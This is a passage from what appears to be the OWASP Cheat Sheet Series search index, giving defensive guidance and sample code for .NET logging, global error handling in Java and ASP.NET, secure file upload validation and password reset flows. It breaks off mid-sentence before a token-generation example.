DO: Run the OWASP Dependency Checker against your application as part of your build process and act on any high level vulnerabilities.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a10-insufficient-logging-monitoring","title":"A10 Insufficient Logging & Monitoring","text":"

DO: Ensure all login failures, access control failures, and server-side input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts.

DO: Establish effective monitoring and alerting so suspicious activities are detected and responded to in a timely fashion.

DO NOT: Log generic error messages such as Log.Error(\"Error was thrown\"); rather, log the stack trace, error message, and the ID of the user who caused the error.

DO NOT: Log sensitive data such as users' passwords.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#logging","title":"Logging","text":"

Information about what logs to collect and more details about logging can be found in this cheat sheet.

.NET Core comes with a LoggerFactory, which is in Microsoft.Extensions.Logging. More information about ILogger can be found here.

The following example shows how to log all errors from Startup.cs, so that anytime an error is thrown it will be logged.

public void Configure(IApplicationBuilder app, IHostingEnvironment env)\n{\nif (env.IsDevelopment())\n{\n_isDevelopment = true;\napp.UseDeveloperExceptionPage();\n}\n\n//Log all errors in the application\napp.UseExceptionHandler(errorApp =>\n{\nerrorApp.Run(async context =>\n{\nvar errorFeature = context.Features.Get<IExceptionHandlerFeature>();\nvar exception = errorFeature.Error;\n\nLog.Error(String.Format(\"Stacktrace of error: {0}\",exception.StackTrace.ToString()));\n});\n});\n\napp.UseAuthentication();\napp.UseMvc();\n}\n}\n

E.g. injecting the logger into the class constructor, which makes writing unit tests simpler. This is recommended if instances of the class will be created using dependency injection (e.g. MVC controllers). The example below shows logging of all unsuccessful login attempts.

public class AccountsController : Controller\n{\nprivate ILogger _Logger;\n\npublic AccountsController( ILogger logger)\n{\n_Logger = logger;\n}\n\n[HttpPost]\n[AllowAnonymous]\n[ValidateAntiForgeryToken]\npublic async Task<IActionResult> Login(LoginViewModel model)\n{\nif (ModelState.IsValid)\n{\nvar result = await _signInManager.PasswordSignInAsync(model.Email, model.Password, model.RememberMe, lockoutOnFailure: false);\nif (result.Succeeded)\n{\n//Log all successful log in attempts\nLog.Information(String.Format(\"User: {0}, Successfully Logged in\", model.Email));\n//Code for successful login\n}\nelse\n{\n//Log all incorrect log in attempts\nLog.Information(String.Format(\"User: {0}, Incorrect Password\", model.Email));\n}\n}\n...\n}\n

Logging levels for ILogger are listed below, in order of high to low importance: Critical, Error, Warning, Information, Debug, Trace.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#monitoring","title":"Monitoring","text":"

Monitoring allows us to validate the performance and health of a running system through key performance indicators.

In .NET a great option to add monitoring capabilities is Application Insights.

More information about Logging and Monitoring can be found here.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#owasp-2013","title":"OWASP 2013","text":"

Below is a vulnerability that is not discussed in OWASP 2017.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a10-unvalidated-redirects-and-forwards","title":"A10 Unvalidated redirects and forwards","text":"

A protection against this was introduced in the MVC 3 template. Here is the code:

public async Task<ActionResult> LogOn(LogOnViewModel model, string returnUrl)\n{\nif (ModelState.IsValid)\n{\nvar logonResult = await _userManager.TryLogOnAsync(model.UserName, model.Password);\nif (logonResult.Success)\n{\nawait _userManager.LogOnAsync(logonResult.UserName, model.RememberMe);\nreturn RedirectToLocal(returnUrl);\n...\n
private ActionResult RedirectToLocal(string returnUrl)\n{\nif (Url.IsLocalUrl(returnUrl))\n{\nreturn Redirect(returnUrl);\n}\nelse\n{\nreturn RedirectToAction(\"Landing\", \"Account\");\n}\n}\n

Other advice:

More information:

For more information on all of the above, and for code samples incorporated into a sample MVC5 application with an enhanced security baseline, go to the Security Essentials Baseline project.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#xaml-guidance","title":"XAML Guidance","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#windows-forms-guidance","title":"Windows Forms Guidance","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#wcf-guidance","title":"WCF Guidance","text":""},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html","title":"Error Handling Cheat Sheet","text":""},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Error handling is a part of the overall security of an application. Except in movies, an attack always begins with a Reconnaissance phase in which the attacker will try to gather as much technical information (often name and version properties) as possible about the target, such as the application server, frameworks, libraries, etc.

Unhandled errors can assist an attacker in this initial phase, which is very important for the rest of the attack.

The following link provides a description of the different phases of an attack.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#context","title":"Context","text":"

Issues at the error handling level can reveal a lot of information about the target and can also be used to identify injection points in the target's features.

Below is an example of the disclosure of a technology stack, here the Struts2 and Tomcat versions, via an exception rendered to the user:

HTTP Status 500 - For input string: \"null\"\n\ntype Exception report\n\nmessage For input string: \"null\"\n\ndescription The server encountered an internal error that prevented it from fulfilling this request.\n\nexception\n\njava.lang.NumberFormatException: For input string: \"null\"\n    java.lang.NumberFormatException.forInputString(NumberFormatException.java:65)\n    java.lang.Integer.parseInt(Integer.java:492)\n    java.lang.Integer.parseInt(Integer.java:527)\n    sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\n    sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)\n    sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\n    java.lang.reflect.Method.invoke(Method.java:606)\n    com.opensymphony.xwork2.DefaultActionInvocation.invokeAction(DefaultActionInvocation.java:450)\n    com.opensymphony.xwork2.DefaultActionInvocation.invokeActionOnly(DefaultActionInvocation.java:289)\n    com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:252)\n    org.apache.struts2.interceptor.debugging.DebuggingInterceptor.intercept(DebuggingInterceptor.java:256)\n    com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:246)\n    ...\n\nnote: The full stack trace of the root cause is available in the Apache Tomcat/7.0.56 logs.\n

Below is an example of disclosure of a SQL query error, along with the site installation path, that can be used to identify an injection point:

Warning: odbc_fetch_array() expects parameter /1 to be resource, boolean given\nin D:\\app\\index_new.php on line 188\n

The OWASP Testing Guide provides different techniques to obtain technical information from an application.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#objective","title":"Objective","text":"

The article shows how to configure a global error handler as part of your application's runtime configuration. In some cases, it may be more efficient to define this error handler as part of your code. The outcome is that when an unexpected error occurs, the application returns a generic response while the error details are logged server-side for investigation, instead of being returned to the user.

The following schema shows the target approach:

As most recent application topologies are API based, we assume in this article that the backend exposes only a REST API and does not contain any user interface content. The application should try to exhaustively cover all possible failure modes and use 5xx errors only to indicate responses to requests that it cannot fulfill, without providing any content as part of the response that would reveal implementation details. For that, RFC 7807 - Problem Details for HTTP APIs defines a document format. For the error logging operation itself, the logging cheat sheet should be used. This article focuses on the error handling part.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#proposition","title":"Proposition","text":"

For each technology stack, the following configuration options are proposed:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#standard-java-web-application","title":"Standard Java Web Application","text":"

For this kind of application, a global error handler can be configured at the web.xml deployment descriptor level.

We propose here a configuration that can be used from Servlet specification version 2.5 and above.

With this configuration, any unexpected error will cause a redirection to the page error.jsp in which the error will be traced and a generic response will be returned.

Configuration of the redirection into the web.xml file:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<web-app xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://java.sun.com/xml/ns/javaee\"\nxsi:schemaLocation=\"http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd\"\nversion=\"3.0\">\n...\n    <error-page>\n<exception-type>java.lang.Exception</exception-type>\n<location>/error.jsp</location>\n</error-page>\n...\n</web-app>\n

Content of the error.jsp file:

<%@ page language=\"java\" isErrorPage=\"true\" contentType=\"application/json; charset=UTF-8\"\npageEncoding=\"UTF-8\"%>\n<%\nString errorMessage = exception.getMessage();\n//Log the exception via the content of the implicit variable named \"exception\"\n//...\n//We build a generic response with a JSON format because we are in a REST API app context\n//We also add an HTTP response header to indicate to the client app that the response is an error\nresponse.setHeader(\"X-ERROR\", \"true\");\n//Note that we're using an internal server error response\n//In some cases it may be prudent to return 4xx error codes, when we have misbehaving clients\nresponse.setStatus(500);\n%>\n{\"message\":\"An error occurred, please retry\"}\n
"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#java-springmvcspringboot-web-application","title":"Java SpringMVC/SpringBoot web application","text":"

With Spring MVC or Spring Boot, you can define a global error handler by implementing the following class in your project. Spring Framework 6 introduced support for problem details based on RFC 7807.

We indicate to the handler, via the annotation @ExceptionHandler, to act when any exception extending the class java.lang.Exception is thrown by the application. We also use the ProblemDetail class to create the response object.

import org.springframework.http.HttpStatus;\nimport org.springframework.http.ProblemDetail;\nimport org.springframework.web.bind.annotation.ExceptionHandler;\nimport org.springframework.web.bind.annotation.RestControllerAdvice;\nimport org.springframework.web.context.request.WebRequest;\nimport org.springframework.web.servlet.mvc.method.annotation.ResponseEntityExceptionHandler;\n\n/**\n * Global error handler in charge of returning a generic response in case of unexpected error situation.\n */\n@RestControllerAdvice\npublic class RestResponseEntityExceptionHandler extends ResponseEntityExceptionHandler {\n\n@ExceptionHandler(value = {Exception.class})\npublic ProblemDetail handleGlobalError(Exception exception, WebRequest request) {\n//Log the exception via the content of the parameter named \"exception\"\n//...\n//Note that we're using an internal server error response\n//In some cases it may be prudent to return 4xx error codes, if we have misbehaving clients\n//By specification, the content-type can be \"application/problem+json\" or \"application/problem+xml\"\nreturn ProblemDetail.forStatusAndDetail(HttpStatus.INTERNAL_SERVER_ERROR, \"An error occurred, please retry\");\n}\n}\n

References:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#asp-net-core-web-application","title":"ASP NET Core web application","text":"

With ASP.NET Core, you can define a global error handler by indicating that the exception handler is a dedicated API Controller.

Content of the API Controller dedicated to the error handling:

using Microsoft.AspNetCore.Authorization;\nusing Microsoft.AspNetCore.Diagnostics;\nusing Microsoft.AspNetCore.Mvc;\nusing System;\nusing System.Collections.Generic;\nusing System.Net;\n\nnamespace MyProject.Controllers\n{\n/// <summary>\n/// API Controller used to intercept and handle all unexpected exceptions\n/// </summary>\n[Route(\"api/[controller]\")]\n[ApiController]\n[AllowAnonymous]\npublic class ErrorController : ControllerBase\n{\n/// <summary>\n/// Action that will be invoked for any call to this Controller in order to handle the current error\n/// </summary>\n/// <returns>A generic error formatted as JSON because we are in a REST API app context</returns>\n[HttpGet]\n[HttpPost]\n[HttpHead]\n[HttpDelete]\n[HttpPut]\n[HttpOptions]\n[HttpPatch]\npublic JsonResult Handle()\n{\n//Get the exception that triggered the call to this controller\nException exception = HttpContext.Features.Get<IExceptionHandlerFeature>()?.Error;\n//Log the exception via the content of the variable named \"exception\" if it is not NULL\n//...\n//We build a generic response with a JSON format because we are in a REST API app context\n//We also add an HTTP response header to indicate to the client app that the response\n//is an error\nvar responseBody = new Dictionary<String, String>{ {\n\"message\", \"An error occurred, please retry\"\n} };\nJsonResult response = new JsonResult(responseBody);\n//Note that we're using an internal server error response\n//In some cases it may be prudent to return 4xx error codes, if we have misbehaving clients\nresponse.StatusCode = (int)HttpStatusCode.InternalServerError;\nRequest.HttpContext.Response.Headers.Remove(\"X-ERROR\");\nRequest.HttpContext.Response.Headers.Add(\"X-ERROR\", \"true\");\nreturn response;\n}\n}\n}\n

Definition in the application Startup.cs file of the mapping of the exception handler to the dedicated error handling API controller:

using Microsoft.AspNetCore.Builder;\nusing Microsoft.AspNetCore.Hosting;\nusing Microsoft.AspNetCore.Mvc;\nusing Microsoft.Extensions.Configuration;\nusing Microsoft.Extensions.DependencyInjection;\n\nnamespace MyProject\n{\npublic class Startup\n{\n...\npublic void Configure(IApplicationBuilder app, IHostingEnvironment env)\n{\n//First we configure the error handler middleware!\n//We enable the global error handler in others environments than DEV\n//because debug page are useful during implementation\nif (env.IsDevelopment())\n{\napp.UseDeveloperExceptionPage();\n}\nelse\n{\n//Our global handler is defined on \"/api/error\" URL so we indicate to the\n//exception handler to call this API controller\n//on any unexpected exception raised by the application\napp.UseExceptionHandler(\"/api/error\");\n\n//To customize the response content type and text, use the overload of\n//UseStatusCodePages that takes a content type and format string.\napp.UseStatusCodePages(\"text/plain\", \"Status code page, status code: {0}\");\n}\n\n//We configure others middlewares, remember that the declaration order is important...\napp.UseMvc();\n//...\n}\n}\n}\n

References:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#asp-net-web-api-web-application","title":"ASP NET Web API web application","text":"

With ASP.NET Web API (from the standard .NET framework and not from the .NET Core framework), you can define and register handlers in order to trace and handle any error that occurs in the application.

Definition of the handler for the tracing of the error details:

using System;\nusing System.Web.Http.ExceptionHandling;\n\nnamespace MyProject.Security\n{\n/// <summary>\n/// Global logger used to trace any error that occurs at application wide level\n/// </summary>\npublic class GlobalErrorLogger : ExceptionLogger\n{\n/// <summary>\n/// Method in charge of the management of the error from a tracing point of view\n/// </summary>\n/// <param name=\"context\">Context containing the error details</param>\npublic override void Log(ExceptionLoggerContext context)\n{\n//Get the exception\nException exception = context.Exception;\n//Log the exception via the content of the variable named \"exception\" if it is not NULL\n//...\n}\n}\n}\n

Definition of the handler for the management of the error in order to return a generic response:

using Newtonsoft.Json;\nusing System;\nusing System.Collections.Generic;\nusing System.Net;\nusing System.Net.Http;\nusing System.Text;\nusing System.Threading;\nusing System.Threading.Tasks;\nusing System.Web.Http;\nusing System.Web.Http.ExceptionHandling;\n\nnamespace MyProject.Security\n{\n/// <summary>\n/// Global handler used to handle any error that occurs at application wide level\n/// </summary>\npublic class GlobalErrorHandler : ExceptionHandler\n{\n/// <summary>\n/// Method in charge of handling the generic response sent in case of error\n/// </summary>\n/// <param name=\"context\">Error context</param>\npublic override void Handle(ExceptionHandlerContext context)\n{\ncontext.Result = new GenericResult();\n}\n\n/// <summary>\n/// Class used to represent the generic response sent\n/// </summary>\nprivate class GenericResult : IHttpActionResult\n{\n/// <summary>\n/// Method in charge of creating the generic response\n/// </summary>\n/// <param name=\"cancellationToken\">Object to cancel the task</param>\n/// <returns>A task in charge of sending the generic response</returns>\npublic Task<HttpResponseMessage> ExecuteAsync(CancellationToken cancellationToken)\n{\n//We build a generic response with a JSON format because we are in a REST API app context\n//We also add an HTTP response header to indicate to the client app that the response\n//is an error\nvar responseBody = new Dictionary<String, String>{ {\n\"message\", \"An error occurred, please retry\"\n} };\n// Note that we're using an internal server error response\n// In some cases it may be prudent to return 4xx error codes, if we have misbehaving clients \nHttpResponseMessage response = new HttpResponseMessage(HttpStatusCode.InternalServerError);\nresponse.Headers.Add(\"X-ERROR\", \"true\");\nresponse.Content = new StringContent(JsonConvert.SerializeObject(responseBody),\nEncoding.UTF8, \"application/json\");\nreturn Task.FromResult(response);\n}\n}\n}\n}\n

Registration of both handlers in the application WebApiConfig.cs file:

using MyProject.Security;\nusing System.Web.Http;\nusing System.Web.Http.ExceptionHandling;\n\nnamespace MyProject\n{\npublic static class WebApiConfig\n{\npublic static void Register(HttpConfiguration config)\n{\n//Register global error logging and handling handlers in first\nconfig.Services.Replace(typeof(IExceptionLogger), new GlobalErrorLogger());\nconfig.Services.Replace(typeof(IExceptionHandler), new GlobalErrorHandler());\n//Rest of the configuration\n//...\n}\n}\n}\n

Set the customErrors section in the Web.config file within the <system.web> node as follows.

<configuration>\n...\n<system.web>\n<customErrors mode=\"RemoteOnly\"\ndefaultRedirect=\"~/ErrorPages/Oops.aspx\" />\n...\n</system.web>\n</configuration>\n

References:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#sources-of-the-prototype","title":"Sources of the prototype","text":"

The source code of all the sandbox projects created to find the right setup to use is stored in this GitHub repository.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#appendix-http-errors","title":"Appendix HTTP Errors","text":"

A reference for HTTP errors can be found in RFC 2616. Using error messages that do not provide implementation details is important to avoid information leakage. In general, consider using 4xx error codes for requests that are due to an error on the part of the HTTP client (e.g. unauthorized access, request body too large) and use 5xx to indicate errors that are triggered on the server side, due to an unforeseen bug. Ensure that applications are monitored for 5xx errors, which are a good indication of the application failing for some sets of inputs.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html","title":"File Upload Cheat Sheet","text":""},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#introduction","title":"Introduction","text":"

File upload is becoming a more and more essential part of any application, where the user is able to upload their photo, their CV, or a video showcasing a project they are working on. The application should be able to fend off bogus and malicious files in a way that keeps the application and its users safe.

In short, the following principles should be followed to reach a secure file upload implementation:

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-upload-threats","title":"File Upload Threats","text":"

In order to assess and know exactly what controls to implement, it is essential to understand what you're facing so you can protect your assets. The following sections will hopefully showcase the risks accompanying the file upload functionality.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#malicious-files","title":"Malicious Files","text":"

The attacker delivers a file for malicious intent, such as:

  1. Exploit vulnerabilities in the file parser or processing module (e.g. ImageTrick Exploit, XXE)
  2. Use the file for phishing (e.g. careers form)
  3. Send ZIP bombs, XML bombs (otherwise known as billion laughs attack), or simply huge files in a way to fill the server storage which hinders and damages the server's availability
  4. Overwrite an existing file on the system
  5. Client-side active content (XSS, CSRF, etc.) that could endanger other users if the files are publicly retrievable.
"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#public-file-retrieval","title":"Public File Retrieval","text":"

If the uploaded file is publicly retrievable, additional threats need to be addressed:

  1. Public disclosure of other files
  2. Initiate a DoS attack by requesting lots of files. Requests are small, yet responses are much larger
  3. File content that could be deemed as illegal, offensive, or dangerous (e.g. personal data, copyrighted data, etc.) which will make you a host for such malicious files.
"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-upload-protection","title":"File Upload Protection","text":"

There is no silver bullet in validating user content. Implementing a defense-in-depth approach is key to making the upload process harder and more locked down to the needs and requirements of the service. Implementing multiple techniques is recommended, as no single technique is enough to secure the service.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#extension-validation","title":"Extension Validation","text":"

Ensure that the validation occurs after decoding the file name, and that a proper filter is set in place in order to avoid certain known bypasses, such as the following:

Refer to the Input Validation CS to properly parse and process the extension.
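
For illustration, the following is a minimal Java sketch (not a complete defense) of an allow-list extension check performed after decoding the file name; the class name and the allowed extensions are example assumptions, not part of this cheat sheet:

import java.net.URLDecoder;\nimport java.nio.charset.StandardCharsets;\nimport java.util.Locale;\nimport java.util.Set;\n\npublic class ExtensionValidator {\n//Allowed extensions are example values only: adapt them to the business need\nprivate static final Set<String> ALLOWED_EXTENSIONS = Set.of(\"jpg\", \"jpeg\", \"png\", \"pdf\");\n\npublic static boolean hasAllowedExtension(String rawFileName) {\n//Decode the file name first so that encoded bypasses (e.g. %2E) are caught by the filter\nString fileName = URLDecoder.decode(rawFileName, StandardCharsets.UTF_8);\nint lastDot = fileName.lastIndexOf('.');\n//Reject files without an extension or with a trailing dot\nif (lastDot == -1 || lastDot == fileName.length() - 1) {\nreturn false;\n}\nString extension = fileName.substring(lastDot + 1).toLowerCase(Locale.ROOT);\nreturn ALLOWED_EXTENSIONS.contains(extension);\n}\n}\n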

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#list-allowed-extensions","title":"List Allowed Extensions","text":"

Allow only business-critical extensions, without permitting any type of non-required extensions. For example, if the system requires:

Based on the needs of the application, ensure that only the least harmful and lowest risk file types can be used.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#block-extensions","title":"Block Extensions","text":"

Identify potentially harmful file types and block extensions that you regard as harmful to your service.

Please be aware that blocking specific extensions is a weak protection method on its own. The Unrestricted File Upload vulnerability article describes how attackers may attempt to bypass such a check.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#content-type-validation","title":"Content-Type Validation","text":"

The Content-Type for uploaded files is provided by the user, and as such cannot be trusted, as it is trivial to spoof. Although it should not be relied upon for security, it provides a quick check to prevent users from unintentionally uploading files with the incorrect type.

Other than defining the extension of the uploaded file, its MIME-type can be checked for a quick protection against simple file upload attacks.

This can be done preferably in an allow list approach; otherwise, this can be done in a block list approach.
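
As a hedged sketch of such an allow-list check, assuming a Jakarta Servlet multipart upload; the class name and listed MIME types are examples only:

import jakarta.servlet.http.Part;\nimport java.util.Locale;\nimport java.util.Set;\n\npublic class ContentTypeValidator {\n//Example allow list: adapt it to the MIME types the service actually requires\nprivate static final Set<String> ALLOWED_TYPES = Set.of(\"image/jpeg\", \"image/png\", \"application/pdf\");\n\npublic static boolean hasAllowedContentType(Part uploadedPart) {\n//The Content-Type is user controlled, so this is only a quick sanity check, not a security control on its own\nString contentType = uploadedPart.getContentType();\nreturn contentType != null && ALLOWED_TYPES.contains(contentType.toLowerCase(Locale.ROOT));\n}\n}\n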

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-signature-validation","title":"File Signature Validation","text":"

In conjunction with content-type validation, the file's signature can be checked and verified against the expected file type.

This should not be used on its own, as bypassing it is pretty common and easy.
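
For example, here is a Java sketch that checks the PNG magic number; each expected type needs its own signature, and the class name is illustrative:

import java.io.IOException;\nimport java.io.InputStream;\nimport java.util.Arrays;\n\npublic class FileSignatureValidator {\n//PNG magic number (first 8 bytes); other expected types need their own signatures\nprivate static final byte[] PNG_SIGNATURE = {(byte) 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A};\n\npublic static boolean looksLikePng(InputStream in) throws IOException {\nbyte[] header = in.readNBytes(PNG_SIGNATURE.length);\n//Signatures can be forged, so combine this check with the other controls in this cheat sheet\nreturn Arrays.equals(header, PNG_SIGNATURE);\n}\n}\n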

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#filename-sanitization","title":"Filename Sanitization","text":"

Filenames can endanger the system in multiple ways, either by using unacceptable characters or by using special and restricted filenames. For Windows, refer to the following MSDN guide. For a wider overview on different filesystems and how they treat files, refer to Wikipedia's Filename page.

In order to avoid the above-mentioned threats, creating a random string as a file name, such as generating a UUID/GUID, is essential. If the filename is required by the business needs, proper input validation should be done for client-side (e.g. active content that results in XSS and CSRF attacks) and back-end side (e.g. special files overwrite or creation) attack vectors. Filename length limits should be taken into consideration based on the system storing the files, as each system has its own filename length limit. If user filenames are required, consider implementing the following:
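
Regarding the random file name approach mentioned above, here is a minimal Java sketch (illustrative names; it assumes the extension has already passed the allow-list check):

import java.util.UUID;\n\npublic class StoredFileNameGenerator {\n//The extension is assumed to have already passed the allow-list validation\npublic static String randomStoredName(String validatedExtension) {\n//Use a random UUID so that user-supplied names never reach the file system\nreturn UUID.randomUUID().toString() + \".\" + validatedExtension;\n}\n}\n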

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-content-validation","title":"File Content Validation","text":"

As mentioned in the Public File Retrieval section, file content can contain malicious, inappropriate, or illegal data.

Based on the expected type, special file content validation can be applied:

The File Upload service should allow users to report illegal content, and copyright owners to report abuse.

If there are enough resources, manual file review should be conducted in a sandboxed environment before releasing the files to the public.

Adding some automation to the review could be helpful, but this is a difficult process and should be well studied before being relied upon. Some services (e.g. VirusTotal) provide APIs to scan files against well-known malicious file hashes. Some frameworks can check and validate the raw content type against predefined file types, such as in the ASP.NET Drawing Library. Beware of data leakage threats and information gathering by public services.
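
For images specifically, one common approach, shown here as a hedged Java sketch rather than a mandated control, is to re-decode the uploaded bytes and reject anything that cannot be parsed as an image:

import java.awt.image.BufferedImage;\nimport java.io.IOException;\nimport java.io.InputStream;\nimport javax.imageio.ImageIO;\n\npublic class ImageContentValidator {\npublic static boolean isDecodableImage(InputStream in) throws IOException {\n//ImageIO.read returns null when the stream cannot be decoded as a supported image format\nBufferedImage image = ImageIO.read(in);\nreturn image != null;\n}\n}\n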

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-storage-location","title":"File Storage Location","text":"

The location where the files should be stored must be chosen based on security and business requirements. The following points are set by security priority, and are inclusive:

  1. Store the files on a different host, which allows for complete segregation of duties between the application serving the user, and the host handling file uploads and their storage.
  2. Store the files outside the webroot, where only administrative access is allowed.
  3. Store the files inside the webroot, and set them with write permissions only.
  4. If read access is required, setting proper controls is a must (e.g. internal IP, authorized user, etc.)

Storing files in a studied manner in databases is one additional technique. This is sometimes used to simplify automatic backup processes, avoid file-system attacks, and sidestep permission issues. In return, it opens the door to performance issues (in some cases), adds storage considerations for the database and its backups, and opens the door to SQL injection attacks. This is advised only when a DBA is on the team and this process shows itself to be an improvement over storing the files on the file-system.

Some files are emailed or processed once they are uploaded, and are not stored on the server. It is essential to apply the security measures discussed in this sheet before performing any actions on them.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#user-permissions","title":"User Permissions","text":"

Before any file upload service is accessed, proper validation should occur on two levels for the user uploading a file:

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#filesystem-permissions","title":"Filesystem Permissions","text":"

Set the files' permissions according to the principle of least privilege.

Files should be stored in a way that ensures:

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#upload-and-download-limits","title":"Upload and Download Limits","text":"

The application should set proper size limits for the upload service in order to protect the file storage capacity. If the system is going to extract or process the files, the file size limit should be considered after decompression is conducted, using secure methods to calculate the ZIP files' size. For more on this, see how to Safely extract files from ZipInputStream, Java's input stream to handle ZIP files.
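
Below is a hedged Java sketch of such a check using ZipInputStream; the class name and the entry and size limits are example values only, not recommendations:

import java.io.IOException;\nimport java.io.InputStream;\nimport java.util.zip.ZipInputStream;\n\npublic class SafeZipValidator {\n//The limits below are example values only: tune them to the storage and business constraints\nprivate static final int MAX_ENTRIES = 1000;\nprivate static final long MAX_TOTAL_UNCOMPRESSED_BYTES = 100L * 1024 * 1024;\n\npublic static void validate(InputStream uploadedZip) throws IOException {\nlong totalBytes = 0;\nint entries = 0;\nbyte[] buffer = new byte[8192];\ntry (ZipInputStream zis = new ZipInputStream(uploadedZip)) {\nwhile (zis.getNextEntry() != null) {\nif (++entries > MAX_ENTRIES) {\nthrow new IOException(\"Too many entries in uploaded archive\");\n}\n//Count the real decompressed size instead of trusting the size declared in the entry header\nint read;\nwhile ((read = zis.read(buffer)) != -1) {\ntotalBytes += read;\nif (totalBytes > MAX_TOTAL_UNCOMPRESSED_BYTES) {\nthrow new IOException(\"Uncompressed archive size exceeds the allowed limit\");\n}\n}\nzis.closeEntry();\n}\n}\n}\n}\n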

The application should set proper request limits as well for the download service if available to protect the server from DoS attacks.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#java-code-snippets","title":"Java Code Snippets","text":"

See the Document Upload Protection repository written by Dominique for handling certain document types in Java.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html","title":"Forgot Password Cheat Sheet","text":""},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#introduction","title":"Introduction","text":"

In order to implement a proper user management system, systems integrate a Forgot Password service that allows the user to request a password reset.

Even though this functionality looks straightforward and easy to implement, it is a common source of vulnerabilities, such as the renowned user enumeration attack.

The following short guidelines can be used as a quick reference to protect the forgot password service:

This cheat sheet is focused on resetting users' passwords. For guidance on resetting multifactor authentication (MFA), see the relevant section in the Multifactor Authentication Cheat Sheet.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#forgot-password-service","title":"Forgot Password Service","text":"

The password reset process can be broken into two main steps, detailed in the following sections.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#forgot-password-request","title":"Forgot Password Request","text":"

When a user uses the forgot password service and inputs their username or email, the below should be followed to implement a secure process:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#user-resets-password","title":"User Resets Password","text":"

Once the user has proved their identity by providing the token (sent via an email) or code (sent via SMS or other mechanisms), they should reset their password to a new secure one. In order to secure this step, the measures that should be taken are:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#methods","title":"Methods","text":"

In order to allow a user to request a password reset, you will need to have some way to identify the user, or a means to reach out to them through a side-channel.

This can be done through any of the following methods:

These methods can be used together to provide a greater degree of assurance that the user is who they claim to be. No matter what, you must ensure that a user always has a way to recover their account, even if that involves contacting the support team and proving their identity to staff.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#general-security-practices","title":"General Security Practices","text":"

It is essential to employ good security practices for the reset identifiers (tokens, codes, PINs, etc.). Some points don't apply to the offline methods, such as the lifetime restriction. All tokens and codes should be:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#url-tokens","title":"URL Tokens","text":"

URL tokens are passed in the query string of the URL, and are typically sent to the user via email. The basic overview of the process is as follows:

  1. Generate a token for the user and attach it to the URL query string (see the sketch after this list).
  2. Send this token to the user via email.
  3. Don't rely on the Host header while creating the reset URLs to avoid Host Header Injection attacks. The URL should either be hard-coded or validated against a list of trusted domains.
  4. Ensure that the URL is using HTTPS.
  5. The user receives the email, and browses to the URL with the attached token.
  6. Ensure that the reset password page adds the Referrer Policy tag with the noreferrer value in order to avoid referrer leakage.
  7. Implement appropriate protection to prevent users from brute-forcing tokens in the URL, such as rate limiting.
  8. If required, perform any additional validation steps such as requiring the user to answer security questions.
  9. Let the user create a new password and confirm it. Ensure that the same password policy used elsewhere in the application is applied.

Note: URL tokens can follow the same behavior as PINs by creating a restricted session from the token. The decision should be made based on the needs and the expertise of the developer.
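
As an illustrative sketch (not a prescribed implementation), a URL token can be generated in Java with a CSPRNG; the class name is an assumption, and storage, expiry, and single-use enforcement are left to the application:

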